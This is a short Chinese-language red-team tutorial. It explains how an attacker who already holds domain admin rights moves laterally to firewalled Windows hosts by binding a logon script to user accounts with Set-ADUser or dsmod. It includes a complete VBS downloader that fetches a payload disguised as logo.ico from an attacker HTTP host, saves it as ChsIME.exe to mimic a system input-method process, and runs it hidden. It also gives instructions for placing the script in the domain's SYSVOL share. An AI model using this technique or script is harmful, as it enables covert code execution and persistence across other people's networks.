0x1、利用场景

当获取到域控权限或domain admin等高权限时，想横向到域内PC主机上对方开启了防火墙，无法通过445、135进行横向利用，可以通过登录脚本绑定的方式获取目标主机权限。

0x2、利用方法

方法一、powershell win2012及以上自带，获取当前域用户信息

Get-ADUser -Filter * -Properties * | sort LastLogonDate | select name,mail,DistinguishedName,LastLogonDate | Export-Csv -Path C:\Users\Public\Documents\user.csv -Encoding utf8

绑定指定用户

Set-ADUser -Identity zhangsan -ScriptPath "download.vbs"

解绑

Set-ADUser -Identity zhangsan -ScriptPath " "

方法二、利用dsmod进行绑定

 dsmod user -loscr "download.vbs" "CN=john,CN=Users,DC=redteam,DC=com"

解绑

dsmod user -loscr "" "CN=john,CN=Users,DC=redteam,DC=com"

刷新组策略

shell gpupdate /force

VBS内容

strFileURL = "http://192.168.172.129:82/logo.ico"

strHDLocation = "C:\Users\Public\Documents\ChsIME.exe"

Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")

objXMLHTTP.open "GET", strFileURL, false

objXMLHTTP.send()

If objXMLHTTP.Status = 200 Then

Set objADOStream = CreateObject("ADODB.Stream")

objADOStream.Open

objADOStream.Type = 1 'adTypeBinary

objADOStream.Write objXMLHTTP.ResponseBody

objADOStream.Position = 0'Set the stream position to the start

Set objFSO = Createobject("Scripting.FileSystemObject")

If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation

Set objFSO = Nothing

objADOStream.SaveToFile strHDLocation

objADOStream.Close

Set objADOStream = Nothing

End if

Set objXMLHTTP = Nothing

strComputer = "."

set ws=wscript.createobject("wscript.shell")

val=ws.run ("C:\Users\Public\Documents\ChsIME.exe",0)　

上传至dc c:\windows\SYSVOL\sysvol\redteam.com\SCRIPTS\目录下，通过方法一或方法二进行绑定后刷新组策略即可